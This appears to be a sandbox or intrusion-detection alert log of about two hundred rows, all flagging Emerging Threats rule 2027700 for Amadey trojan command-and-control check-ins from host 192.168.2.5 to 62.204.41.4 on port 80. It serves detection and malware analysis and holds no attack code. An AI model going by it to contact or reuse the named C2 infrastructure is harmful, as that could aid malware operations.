192.168.2.562.204.41.449775802027700 02/07/23-19:57:23.025798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49775	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449858802027700 02/07/23-19:57:49.109185	TCP	2027700	ET TROJAN Amadey CnC Check-In	49858	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449794802027700 02/07/23-19:57:30.288757	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450140802027700 02/07/23-19:59:06.654084	TCP	2027700	ET TROJAN Amadey CnC Check-In	50140	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450394802027700 02/07/23-20:00:15.033222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50394	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449791802027700 02/07/23-19:57:29.556151	TCP	2027700	ET TROJAN Amadey CnC Check-In	49791	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450042802027700 02/07/23-19:58:37.715383	TCP	2027700	ET TROJAN Amadey CnC Check-In	50042	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450296802027700 02/07/23-19:59:49.030441	TCP	2027700	ET TROJAN Amadey CnC Check-In	50296	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450039802027700 02/07/23-19:58:36.996099	TCP	2027700	ET TROJAN Amadey CnC Check-In	50039	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449922802027700 02/07/23-19:58:06.074309	TCP	2027700	ET TROJAN Amadey CnC Check-In	49922	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449880802027700 02/07/23-19:57:54.223863	TCP	2027700	ET TROJAN Amadey CnC Check-In	49880	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449931802027700 02/07/23-19:58:08.920914	TCP	2027700	ET TROJAN Amadey CnC Check-In	49931	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450455802027700 02/07/23-20:00:31.736851	TCP	2027700	ET TROJAN Amadey CnC Check-In	50455	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450201802027700 02/07/23-19:59:21.107449	TCP	2027700	ET TROJAN Amadey CnC Check-In	50201	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450325802027700 02/07/23-19:59:56.050545	TCP	2027700	ET TROJAN Amadey CnC Check-In	50325	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449836802027700 02/07/23-19:57:40.268244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49836	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450366802027700 02/07/23-20:00:08.251401	TCP	2027700	ET TROJAN Amadey CnC Check-In	50366	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450449802027700 02/07/23-20:00:30.317849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50449	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450242802027700 02/07/23-19:59:33.886857	TCP	2027700	ET TROJAN Amadey CnC Check-In	50242	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450414802027700 02/07/23-20:00:20.800586	TCP	2027700	ET TROJAN Amadey CnC Check-In	50414	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450112802027700 02/07/23-19:58:57.136239	TCP	2027700	ET TROJAN Amadey CnC Check-In	50112	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449877802027700 02/07/23-19:57:53.477790	TCP	2027700	ET TROJAN Amadey CnC Check-In	49877	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449706802027700 02/07/23-19:57:08.141498	TCP	2027700	ET TROJAN Amadey CnC Check-In	49706	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449919802027700 02/07/23-19:58:03.999927	TCP	2027700	ET TROJAN Amadey CnC Check-In	49919	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449747802027700 02/07/23-19:57:17.384762	TCP	2027700	ET TROJAN Amadey CnC Check-In	49747	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449788802027700 02/07/23-19:57:28.836185	TCP	2027700	ET TROJAN Amadey CnC Check-In	49788	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450099802027700 02/07/23-19:58:53.985606	TCP	2027700	ET TROJAN Amadey CnC Check-In	50099	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450283802027700 02/07/23-19:59:45.895142	TCP	2027700	ET TROJAN Amadey CnC Check-In	50283	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450153802027700 02/07/23-19:59:09.775607	TCP	2027700	ET TROJAN Amadey CnC Check-In	50153	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450194802027700 02/07/23-19:59:19.434056	TCP	2027700	ET TROJAN Amadey CnC Check-In	50194	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450408802027700 02/07/23-20:00:18.376566	TCP	2027700	ET TROJAN Amadey CnC Check-In	50408	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449861802027700 02/07/23-19:57:49.861421	TCP	2027700	ET TROJAN Amadey CnC Check-In	49861	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449903802027700 02/07/23-19:57:59.838875	TCP	2027700	ET TROJAN Amadey CnC Check-In	49903	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449991802027700 02/07/23-19:58:23.361807	TCP	2027700	ET TROJAN Amadey CnC Check-In	49991	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450058802027700 02/07/23-19:58:41.573761	TCP	2027700	ET TROJAN Amadey CnC Check-In	50058	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449950802027700 02/07/23-19:58:13.249773	TCP	2027700	ET TROJAN Amadey CnC Check-In	49950	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449725802027700 02/07/23-19:57:11.991747	TCP	2027700	ET TROJAN Amadey CnC Check-In	49725	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449918802027700 02/07/23-19:58:03.708587	TCP	2027700	ET TROJAN Amadey CnC Check-In	49918	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450053802027700 02/07/23-19:58:40.354567	TCP	2027700	ET TROJAN Amadey CnC Check-In	50053	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450344802027700 02/07/23-20:00:01.675171	TCP	2027700	ET TROJAN Amadey CnC Check-In	50344	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449823802027700 02/07/23-19:57:37.077825	TCP	2027700	ET TROJAN Amadey CnC Check-In	49823	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450148802027700 02/07/23-19:59:08.546698	TCP	2027700	ET TROJAN Amadey CnC Check-In	50148	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450442802027700 02/07/23-20:00:28.613580	TCP	2027700	ET TROJAN Amadey CnC Check-In	50442	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449841802027700 02/07/23-19:57:41.479215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49841	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449997802027700 02/07/23-19:58:26.812666	TCP	2027700	ET TROJAN Amadey CnC Check-In	49997	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450460802027700 02/07/23-20:00:32.743842	TCP	2027700	ET TROJAN Amadey CnC Check-In	50460	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449851802027700 02/07/23-19:57:45.497082	TCP	2027700	ET TROJAN Amadey CnC Check-In	49851	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450264802027700 02/07/23-19:59:39.205304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50264	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450025802027700 02/07/23-19:58:33.797119	TCP	2027700	ET TROJAN Amadey CnC Check-In	50025	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450166802027700 02/07/23-19:59:12.953354	TCP	2027700	ET TROJAN Amadey CnC Check-In	50166	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450377802027700 02/07/23-20:00:10.926718	TCP	2027700	ET TROJAN Amadey CnC Check-In	50377	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450007802027700 02/07/23-19:58:29.284926	TCP	2027700	ET TROJAN Amadey CnC Check-In	50007	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450081802027700 02/07/23-19:58:49.575685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50081	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450359802027700 02/07/23-20:00:06.547654	TCP	2027700	ET TROJAN Amadey CnC Check-In	50359	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450086802027700 02/07/23-19:58:50.782617	TCP	2027700	ET TROJAN Amadey CnC Check-In	50086	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450282802027700 02/07/23-19:59:45.658356	TCP	2027700	ET TROJAN Amadey CnC Check-In	50282	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450203802027700 02/07/23-19:59:22.078648	TCP	2027700	ET TROJAN Amadey CnC Check-In	50203	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449954802027700 02/07/23-19:58:14.184522	TCP	2027700	ET TROJAN Amadey CnC Check-In	49954	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449758802027700 02/07/23-19:57:19.484125	TCP	2027700	ET TROJAN Amadey CnC Check-In	49758	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450043802027700 02/07/23-19:58:37.945632	TCP	2027700	ET TROJAN Amadey CnC Check-In	50043	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450002802027700 02/07/23-19:58:27.980529	TCP	2027700	ET TROJAN Amadey CnC Check-In	50002	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450221802027700 02/07/23-19:59:28.870563	TCP	2027700	ET TROJAN Amadey CnC Check-In	50221	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449946802027700 02/07/23-19:58:12.312159	TCP	2027700	ET TROJAN Amadey CnC Check-In	49946	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450316802027700 02/07/23-19:59:53.881599	TCP	2027700	ET TROJAN Amadey CnC Check-In	50316	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450470802027700 02/07/23-20:00:35.113671	TCP	2027700	ET TROJAN Amadey CnC Check-In	50470	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449969802027700 02/07/23-19:58:17.745575	TCP	2027700	ET TROJAN Amadey CnC Check-In	49969	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450020802027700 02/07/23-19:58:32.557219	TCP	2027700	ET TROJAN Amadey CnC Check-In	50020	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449928802027700 02/07/23-19:58:08.200692	TCP	2027700	ET TROJAN Amadey CnC Check-In	49928	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450061802027700 02/07/23-19:58:42.609485	TCP	2027700	ET TROJAN Amadey CnC Check-In	50061	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449768802027700 02/07/23-19:57:21.340554	TCP	2027700	ET TROJAN Amadey CnC Check-In	49768	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449987802027700 02/07/23-19:58:22.091332	TCP	2027700	ET TROJAN Amadey CnC Check-In	49987	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450292802027700 02/07/23-19:59:48.086269	TCP	2027700	ET TROJAN Amadey CnC Check-In	50292	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449763802027700 02/07/23-19:57:20.363784	TCP	2027700	ET TROJAN Amadey CnC Check-In	49763	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449964802027700 02/07/23-19:58:16.564709	TCP	2027700	ET TROJAN Amadey CnC Check-In	49964	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450369802027700 02/07/23-20:00:08.954484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50369	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450387802027700 02/07/23-20:00:13.346042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50387	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449786802027700 02/07/23-19:57:28.358002	TCP	2027700	ET TROJAN Amadey CnC Check-In	49786	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449982802027700 02/07/23-19:58:20.917525	TCP	2027700	ET TROJAN Amadey CnC Check-In	49982	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450091802027700 02/07/23-19:58:52.034089	TCP	2027700	ET TROJAN Amadey CnC Check-In	50091	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450211802027700 02/07/23-19:59:26.414967	TCP	2027700	ET TROJAN Amadey CnC Check-In	50211	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449959802027700 02/07/23-19:58:15.371241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49959	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450404802027700 02/07/23-20:00:17.416361	TCP	2027700	ET TROJAN Amadey CnC Check-In	50404	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449800802027700 02/07/23-19:57:31.745131	TCP	2027700	ET TROJAN Amadey CnC Check-In	49800	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450033802027700 02/07/23-19:58:35.799544	TCP	2027700	ET TROJAN Amadey CnC Check-In	50033	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450030802027700 02/07/23-19:58:35.059294	TCP	2027700	ET TROJAN Amadey CnC Check-In	50030	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450367802027700 02/07/23-20:00:08.484564	TCP	2027700	ET TROJAN Amadey CnC Check-In	50367	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450382802027700 02/07/23-20:00:12.143005	TCP	2027700	ET TROJAN Amadey CnC Check-In	50382	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450189802027700 02/07/23-19:59:18.468588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50189	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450459802027700 02/07/23-20:00:32.490579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50459	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449956802027700 02/07/23-19:58:14.672244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49956	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450107802027700 02/07/23-19:58:55.941894	TCP	2027700	ET TROJAN Amadey CnC Check-In	50107	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450339802027700 02/07/23-19:59:59.425942	TCP	2027700	ET TROJAN Amadey CnC Check-In	50339	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450048802027700 02/07/23-19:58:39.136453	TCP	2027700	ET TROJAN Amadey CnC Check-In	50048	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449778802027700 02/07/23-19:57:24.022380	TCP	2027700	ET TROJAN Amadey CnC Check-In	49778	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449892802027700 02/07/23-19:57:57.200519	TCP	2027700	ET TROJAN Amadey CnC Check-In	49892	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450241802027700 02/07/23-19:59:33.653837	TCP	2027700	ET TROJAN Amadey CnC Check-In	50241	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450397802027700 02/07/23-20:00:15.752527	TCP	2027700	ET TROJAN Amadey CnC Check-In	50397	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450440802027700 02/07/23-20:00:28.144249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50440	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450226802027700 02/07/23-19:59:30.062964	TCP	2027700	ET TROJAN Amadey CnC Check-In	50226	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449821802027700 02/07/23-19:57:36.603814	TCP	2027700	ET TROJAN Amadey CnC Check-In	49821	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450063802027700 02/07/23-19:58:43.919705	TCP	2027700	ET TROJAN Amadey CnC Check-In	50063	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449773802027700 02/07/23-19:57:22.545756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49773	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450318802027700 02/07/23-19:59:54.361124	TCP	2027700	ET TROJAN Amadey CnC Check-In	50318	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449913802027700 02/07/23-19:58:02.266316	TCP	2027700	ET TROJAN Amadey CnC Check-In	49913	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449992802027700 02/07/23-19:58:23.691995	TCP	2027700	ET TROJAN Amadey CnC Check-In	49992	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449995802027700 02/07/23-19:58:25.960796	TCP	2027700	ET TROJAN Amadey CnC Check-In	49995	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450354802027700 02/07/23-20:00:05.364849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50354	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449735802027700 02/07/23-19:57:14.444183	TCP	2027700	ET TROJAN Amadey CnC Check-In	49735	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449776802027700 02/07/23-19:57:23.344979	TCP	2027700	ET TROJAN Amadey CnC Check-In	49776	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450432802027700 02/07/23-20:00:26.215534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50432	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450313802027700 02/07/23-19:59:53.159401	TCP	2027700	ET TROJAN Amadey CnC Check-In	50313	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449854802027700 02/07/23-19:57:48.147586	TCP	2027700	ET TROJAN Amadey CnC Check-In	49854	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450395802027700 02/07/23-20:00:15.267609	TCP	2027700	ET TROJAN Amadey CnC Check-In	50395	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450005802027700 02/07/23-19:58:28.753873	TCP	2027700	ET TROJAN Amadey CnC Check-In	50005	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449984802027700 02/07/23-19:58:21.387139	TCP	2027700	ET TROJAN Amadey CnC Check-In	49984	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450176802027700 02/07/23-19:59:15.314802	TCP	2027700	ET TROJAN Amadey CnC Check-In	50176	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449813802027700 02/07/23-19:57:34.897396	TCP	2027700	ET TROJAN Amadey CnC Check-In	49813	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450135802027700 02/07/23-19:59:05.579215	TCP	2027700	ET TROJAN Amadey CnC Check-In	50135	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449926802027700 02/07/23-19:58:07.720137	TCP	2027700	ET TROJAN Amadey CnC Check-In	49926	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449707802027700 02/07/23-19:57:08.383912	TCP	2027700	ET TROJAN Amadey CnC Check-In	49707	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450071802027700 02/07/23-19:58:47.153403	TCP	2027700	ET TROJAN Amadey CnC Check-In	50071	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450254802027700 02/07/23-19:59:36.757803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50254	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450326802027700 02/07/23-19:59:56.296800	TCP	2027700	ET TROJAN Amadey CnC Check-In	50326	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450290802027700 02/07/23-19:59:47.592742	TCP	2027700	ET TROJAN Amadey CnC Check-In	50290	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449748802027700 02/07/23-19:57:17.627780	TCP	2027700	ET TROJAN Amadey CnC Check-In	49748	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449967802027700 02/07/23-19:58:17.264761	TCP	2027700	ET TROJAN Amadey CnC Check-In	49967	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450076802027700 02/07/23-19:58:48.365768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50076	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450295802027700 02/07/23-19:59:48.802433	TCP	2027700	ET TROJAN Amadey CnC Check-In	50295	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450213802027700 02/07/23-19:59:26.928062	TCP	2027700	ET TROJAN Amadey CnC Check-In	50213	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450035802027700 02/07/23-19:58:36.040025	TCP	2027700	ET TROJAN Amadey CnC Check-In	50035	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449789802027700 02/07/23-19:57:29.074930	TCP	2027700	ET TROJAN Amadey CnC Check-In	49789	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450056802027700 02/07/23-19:58:41.093535	TCP	2027700	ET TROJAN Amadey CnC Check-In	50056	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450145802027700 02/07/23-19:59:07.823731	TCP	2027700	ET TROJAN Amadey CnC Check-In	50145	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449783802027700 02/07/23-19:57:27.313901	TCP	2027700	ET TROJAN Amadey CnC Check-In	49783	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449933802027700 02/07/23-19:58:09.387568	TCP	2027700	ET TROJAN Amadey CnC Check-In	49933	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449961802027700 02/07/23-19:58:15.841480	TCP	2027700	ET TROJAN Amadey CnC Check-In	49961	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449844802027700 02/07/23-19:57:42.215376	TCP	2027700	ET TROJAN Amadey CnC Check-In	49844	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450111802027700 02/07/23-19:58:56.896574	TCP	2027700	ET TROJAN Amadey CnC Check-In	50111	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450463802027700 02/07/23-20:00:33.458704	TCP	2027700	ET TROJAN Amadey CnC Check-In	50463	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450117802027700 02/07/23-19:58:58.328195	TCP	2027700	ET TROJAN Amadey CnC Check-In	50117	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450469802027700 02/07/23-20:00:34.879330	TCP	2027700	ET TROJAN Amadey CnC Check-In	50469	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449755802027700 02/07/23-19:57:18.963514	TCP	2027700	ET TROJAN Amadey CnC Check-In	49755	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450200802027700 02/07/23-19:59:20.859043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50200	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450206802027700 02/07/23-19:59:23.596825	TCP	2027700	ET TROJAN Amadey CnC Check-In	50206	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449951802027700 02/07/23-19:58:13.482140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49951	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450285802027700 02/07/23-19:59:46.406219	TCP	2027700	ET TROJAN Amadey CnC Check-In	50285	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449939802027700 02/07/23-19:58:10.592369	TCP	2027700	ET TROJAN Amadey CnC Check-In	49939	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450022802027700 02/07/23-19:58:33.047755	TCP	2027700	ET TROJAN Amadey CnC Check-In	50022	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450374802027700 02/07/23-20:00:10.203248	TCP	2027700	ET TROJAN Amadey CnC Check-In	50374	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449905802027700 02/07/23-19:58:00.330109	TCP	2027700	ET TROJAN Amadey CnC Check-In	49905	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450196802027700 02/07/23-19:59:19.903167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50196	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450066802027700 02/07/23-19:58:45.929274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50066	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450351802027700 02/07/23-20:00:04.658670	TCP	2027700	ET TROJAN Amadey CnC Check-In	50351	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450173802027700 02/07/23-19:59:14.605094	TCP	2027700	ET TROJAN Amadey CnC Check-In	50173	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450392802027700 02/07/23-20:00:14.550844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50392	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449816802027700 02/07/23-19:57:35.633778	TCP	2027700	ET TROJAN Amadey CnC Check-In	49816	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450262802027700 02/07/23-19:59:38.726303	TCP	2027700	ET TROJAN Amadey CnC Check-In	50262	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449793802027700 02/07/23-19:57:30.034311	TCP	2027700	ET TROJAN Amadey CnC Check-In	49793	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450084802027700 02/07/23-19:58:50.307278	TCP	2027700	ET TROJAN Amadey CnC Check-In	50084	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449882802027700 02/07/23-19:57:54.716706	TCP	2027700	ET TROJAN Amadey CnC Check-In	49882	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450257802027700 02/07/23-19:59:37.493308	TCP	2027700	ET TROJAN Amadey CnC Check-In	50257	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449704802027700 02/07/23-19:57:06.319925	TCP	2027700	ET TROJAN Amadey CnC Check-In	49704	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449923802027700 02/07/23-19:58:06.395394	TCP	2027700	ET TROJAN Amadey CnC Check-In	49923	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449971802027700 02/07/23-19:58:18.215583	TCP	2027700	ET TROJAN Amadey CnC Check-In	49971	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450127802027700 02/07/23-19:59:00.745196	TCP	2027700	ET TROJAN Amadey CnC Check-In	50127	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450323802027700 02/07/23-19:59:55.559779	TCP	2027700	ET TROJAN Amadey CnC Check-In	50323	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450412802027700 02/07/23-20:00:19.610273	TCP	2027700	ET TROJAN Amadey CnC Check-In	50412	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449727802027700 02/07/23-19:57:12.532928	TCP	2027700	ET TROJAN Amadey CnC Check-In	49727	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450168802027700 02/07/23-19:59:13.420495	TCP	2027700	ET TROJAN Amadey CnC Check-In	50168	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450038802027700 02/07/23-19:58:36.760813	TCP	2027700	ET TROJAN Amadey CnC Check-In	50038	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450234802027700 02/07/23-19:59:31.956332	TCP	2027700	ET TROJAN Amadey CnC Check-In	50234	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449745802027700 02/07/23-19:57:16.898023	TCP	2027700	ET TROJAN Amadey CnC Check-In	49745	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450216802027700 02/07/23-19:59:27.644779	TCP	2027700	ET TROJAN Amadey CnC Check-In	50216	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450364802027700 02/07/23-20:00:07.781571	TCP	2027700	ET TROJAN Amadey CnC Check-In	50364	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450435802027700 02/07/23-20:00:26.957152	TCP	2027700	ET TROJAN Amadey CnC Check-In	50435	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450453802027700 02/07/23-20:00:31.268227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50453	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449834802027700 02/07/23-19:57:39.774939	TCP	2027700	ET TROJAN Amadey CnC Check-In	49834	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450346802027700 02/07/23-20:00:03.180456	TCP	2027700	ET TROJAN Amadey CnC Check-In	50346	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450050802027700 02/07/23-19:58:39.622154	TCP	2027700	ET TROJAN Amadey CnC Check-In	50050	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450305802027700 02/07/23-19:59:51.225446	TCP	2027700	ET TROJAN Amadey CnC Check-In	50305	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450180802027700 02/07/23-19:59:16.281335	TCP	2027700	ET TROJAN Amadey CnC Check-In	50180	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450186802027700 02/07/23-19:59:17.709490	TCP	2027700	ET TROJAN Amadey CnC Check-In	50186	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450183802027700 02/07/23-19:59:16.984626	TCP	2027700	ET TROJAN Amadey CnC Check-In	50183	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450094802027700 02/07/23-19:58:52.753337	TCP	2027700	ET TROJAN Amadey CnC Check-In	50094	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450275802027700 02/07/23-19:59:42.829008	TCP	2027700	ET TROJAN Amadey CnC Check-In	50275	80	192.168.2.5	62.204.41.4
